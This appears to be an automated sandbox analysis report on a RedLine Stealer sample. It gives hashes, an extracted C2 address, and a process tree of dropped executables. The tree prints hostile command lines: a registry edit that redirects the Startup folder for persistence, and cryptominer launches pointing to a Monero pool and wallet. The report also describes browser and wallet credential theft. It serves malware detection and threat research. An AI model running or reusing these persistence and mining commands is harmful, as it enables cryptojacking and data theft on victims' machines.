Analysis
- max time kernel: 153s
- max time network: 154s
- platform: windows10-2004_x64
- resource: win10v2004-20220331-en
- submitted: 12/04/2022, 07:38

Static task: static1
Behavioral task: behavioral1
Sample: a9d9617466a30b874b80d4fd6465f46b.exe
Resource: win7-20220331-en

General
- Target: a9d9617466a30b874b80d4fd6465f46b.exe
- Size: 233KB
- MD5: a9d9617466a30b874b80d4fd6465f46b
- SHA1: b6e42e3a1fbc20c78e003b065440733fb1cafe84
- SHA256: 15791f0ceae7a162d3280af791cd8837705a7ccb6248bbfc3184cc3306ec4a57
- SHA512: ec3d90e3c7b9427ecb9097941a37872c195cc389bf45a78b7c343d7d964fcf999266cee8bea78907cb302d318b74035948b7db760903692e4275d5016d3e1c89

Malware Config
Extracted
- Family: redline
- Botnet: 123
- C2: 188.68.205.12:7053
- auth_value: cba3087b3c1a6a9c43b3f96591452ea2
Signatures

- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

- RedLine Payload (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x0006000000021e3b-125.dat | family_redline
  behavioral2/files/0x0006000000021e3b-126.dat | family_redline
  behavioral2/memory/3560-131-0x0000000000090000-0x00000000000B0000-memory.dmp | family_redline

- suricata: ET MALWARE CerberTear Ransomware CnC Checkin

- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

- LoaderBot executable (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x0007000000021e54-162.dat | loaderbot
  behavioral2/files/0x0007000000021e54-163.dat | loaderbot
  behavioral2/memory/1324-164-0x0000000000AC0000-0x0000000000EC0000-memory.dmp | loaderbot

- Downloads MZ/PE file

- Executes dropped EXE (7 IoCs)
  pid | Process
  3560 | M3gJNbpqWpct.exe
  4488 | BEgHvre3gJNc.exe
  2788 | 0fcffa63.exe
  5068 | ae2a67f923fc30cc.exe
  1324 | MinerFull.exe
  3948 | Driver.exe
  4120 | Driver.exe

- Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation | ae2a67f923fc30cc.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation | MinerFull.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Control Panel\International\Geo\Nation | a9d9617466a30b874b80d4fd6465f46b.exe

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

- Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerFull.exe" | MinerFull.exe

- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.

- Looks up external IP address via web service (5 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  19 | checkip.amazonaws.com
  96 | ipinfo.io
  97 | ipinfo.io
  101 | ip-api.com
  103 | checkip.amazonaws.com

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Program crash (1 IoC)
  pid | pid_target | Process | procid_target
  3816 | 3948 | WerFault.exe | 108

- Delays execution with timeout.exe (1 IoC)
  pid | Process
  4468 | timeout.exe

- Suspicious behavior: EnumeratesProcesses (46 IoCs)
  pid | Process
  3560 | M3gJNbpqWpct.exe
  1324 | MinerFull.exe (45 occurrences)

- Suspicious behavior: LoadsDriver (1 IoC)
  pid | Process
  652 | Process not Found

- Suspicious use of AdjustPrivilegeToken (9 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 4488 | BEgHvre3gJNc.exe
  Token: SeDebugPrivilege | 3560 | M3gJNbpqWpct.exe
  Token: SeDebugPrivilege | 2788 | 0fcffa63.exe
  Token: SeDebugPrivilege | 5068 | ae2a67f923fc30cc.exe
  Token: SeDebugPrivilege | 1324 | MinerFull.exe
  Token: SeLockMemoryPrivilege | 3948 | Driver.exe
  Token: SeLockMemoryPrivilege | 3948 | Driver.exe
  Token: SeLockMemoryPrivilege | 4120 | Driver.exe
  Token: SeLockMemoryPrivilege | 4120 | Driver.exe

- Suspicious use of WriteProcessMemory (22 IoCs)
  description | pid | Process | procid_target
  PID 3132 wrote to memory of 3560 | 3132 | a9d9617466a30b874b80d4fd6465f46b.exe | 82
  PID 3132 wrote to memory of 3560 | 3132 | a9d9617466a30b874b80d4fd6465f46b.exe | 82
  PID 3132 wrote to memory of 3560 | 3132 | a9d9617466a30b874b80d4fd6465f46b.exe | 82
  PID 3132 wrote to memory of 4488 | 3132 | a9d9617466a30b874b80d4fd6465f46b.exe | 83
  PID 3132 wrote to memory of 4488 | 3132 | a9d9617466a30b874b80d4fd6465f46b.exe | 83
  PID 4488 wrote to memory of 4828 | 4488 | BEgHvre3gJNc.exe | 100
  PID 4488 wrote to memory of 4828 | 4488 | BEgHvre3gJNc.exe | 100
  PID 4828 wrote to memory of 5044 | 4828 | cmd.exe | 102
  PID 4828 wrote to memory of 5044 | 4828 | cmd.exe | 102
  PID 4828 wrote to memory of 4468 | 4828 | cmd.exe | 103
  PID 4828 wrote to memory of 4468 | 4828 | cmd.exe | 103
  PID 4828 wrote to memory of 2788 | 4828 | cmd.exe | 104
  PID 4828 wrote to memory of 2788 | 4828 | cmd.exe | 104
  PID 2788 wrote to memory of 5068 | 2788 | 0fcffa63.exe | 105
  PID 2788 wrote to memory of 5068 | 2788 | 0fcffa63.exe | 105
  PID 5068 wrote to memory of 1324 | 5068 | ae2a67f923fc30cc.exe | 107
  PID 5068 wrote to memory of 1324 | 5068 | ae2a67f923fc30cc.exe | 107
  PID 5068 wrote to memory of 1324 | 5068 | ae2a67f923fc30cc.exe | 107
  PID 1324 wrote to memory of 3948 | 1324 | MinerFull.exe | 108
  PID 1324 wrote to memory of 3948 | 1324 | MinerFull.exe | 108
  PID 1324 wrote to memory of 4120 | 1324 | MinerFull.exe | 113
  PID 1324 wrote to memory of 4120 | 1324 | MinerFull.exe | 113
Processes
(process tree; indentation shows parent/child depth as reported by the sandbox)

C:\Users\Admin\AppData\Local\Temp\a9d9617466a30b874b80d4fd6465f46b.exe (PID 3132)
  Command line: "C:\Users\Admin\AppData\Local\Temp\a9d9617466a30b874b80d4fd6465f46b.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Users\Public\M3gJNbpqWpct.exe (PID 3560)
    Command line: "C:\Users\Public\M3gJNbpqWpct.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Users\Public\BEgHvre3gJNc.exe (PID 4488)
    Command line: "C:\Users\Public\BEgHvre3gJNc.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\cmd.exe (PID 4828)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp405F.tmp.bat""
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\reg.exe (PID 5044)
        Command line: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d "C:\ProgramData\Connector Protection v1.5.0"

      C:\Windows\system32\timeout.exe (PID 4468)
        Command line: timeout 4
        - Delays execution with timeout.exe

      C:\ProgramData\Connector Protection v1.5.0\0fcffa63.exe (PID 2788)
        Command line: "C:\ProgramData\Connector Protection v1.5.0\0fcffa63.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Local\Temp\ae2a67f923fc30cc.exe (PID 5068)
          Command line: "C:\Users\Admin\AppData\Local\Temp\ae2a67f923fc30cc.exe"
          - Executes dropped EXE
          - Checks computer location settings
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

          C:\ProgramData\MinerFull.exe (PID 1324)
            Command line: "C:\ProgramData\MinerFull.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - Adds Run key to start application
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe (PID 3948)
              Command line: "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 1
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken

              C:\Windows\system32\WerFault.exe (PID 3816)
                Command line: C:\Windows\system32\WerFault.exe -u -p 3948 -s 760
                - Program crash

            C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe (PID 4120)
              Command line: "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 45XQiu9A9vmVd5Cy6X35M12NocUr2Hx69X4ZNNu2BsKJYkdksefg2gXJyvBUeEJyDWTfLD6GWmAu4Tab1w4tycfcFMqy8yH -p x -k -v=0 --donate-level=1 -t 1
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\WerFault.exe (PID 3272)
  Command line: C:\Windows\system32\WerFault.exe -pss -s 420 -p 3948 -ip 3948
Network
MITRE ATT&CK Enterprise v6
Downloads
(unique files; the report lists several of them more than once, the count is given per entry)

- Filesize: 42KB (listed 4 times)
  MD5: c523d423234494eeb7b60a892d7a4bea
  SHA1: db992908237ee2ab5c07f4362b9a29516ac09a5d
  SHA256: 98c0617a52694e05760b7f0584a3a0f15f772a4e8598cdd7bd833401e6c596d3
  SHA512: 0aa6808037697dfd7654a845008e9ee231b05e55a2aa5cb2984a060cc6100d4e7ced45483f832d37bde1adad99facf03b17e6a9268a26ed9b9ced1fa389a81ec

- Filesize: 4.0MB (listed 2 times)
  MD5: 5c7bc4cc56f6e6acb801210bc6eda798
  SHA1: 541b6f50091fdc17c2bc8d596c0e202b854fb991
  SHA256: 48f66e13c00038bb2ec12a58bd34cb79f2cf616230c25224c68b81d6c3d7ebf9
  SHA512: 66558bf8679c264c507a1fb8da2fd81347b339d3786487895f902330d63bf9b44be5a136061b0848801b768fea3e525b934d1b04c2cef959cc878b421c6cbd5d

- Filesize: 4.6MB (listed 2 times)
  MD5: 037641cac20d9692868f0bc39282f611
  SHA1: 4458ded6b1f5d3002d5594fe667ad867f9d5ed5e
  SHA256: 4fbdca8e2dd58bf73340aa32542bb45fce19be1fa372393e7571d72a50e24967
  SHA512: 4e1b61a13dbd7ef39b2a2f999eef840126383f33ea5ff6c8208f8060efb21401a531cd8cec761bbf998d77a6f97ea59b513096920a14723022203ef9128d25b1

- Filesize: 356B (listed 1 time)
  MD5: 40f639fc9193f30e711b924ac6e6b2ca
  SHA1: 005d2d1d125bee51b5b0d98b88c8ad26a0801eb9
  SHA256: 92956a38a5f866dc299100b46b2866875ffefaf156a794b66c52fb7e94343f2d
  SHA512: 3c04c3d25b291cb2be58efb572e43c649e57b7dba9a7039467641f1b1888b21368c03ea0d4afcd731885d938bdbfabd0a3d5deac4f8437ef7751a24bd7387c73

- Filesize: 3.9MB (listed 3 times)
  MD5: 02569a7a91a71133d4a1023bf32aa6f4
  SHA1: 0f16bcb3f3f085d3d3be912195558e9f9680d574
  SHA256: 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
  SHA512: 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

- Filesize: 106KB (listed 2 times)
  MD5: 64eeb5ab677596ec8516a8414428b5d7
  SHA1: 4c8e61d0e2abfccb50c9a949d8bcb318b6c5e52a
  SHA256: 2ac567b583c3dc6843f8d7cba45b102b856f269395ee220801c7a490679a53b3
  SHA512: 16012d1985a45256d4978e0506a900ea9c8009530f0068e7870b3ec5b8ba2ebe0eb3542bc28a43eda3a7c1eb4dd2eeae672abb57a9799d51e1db3aa49598c439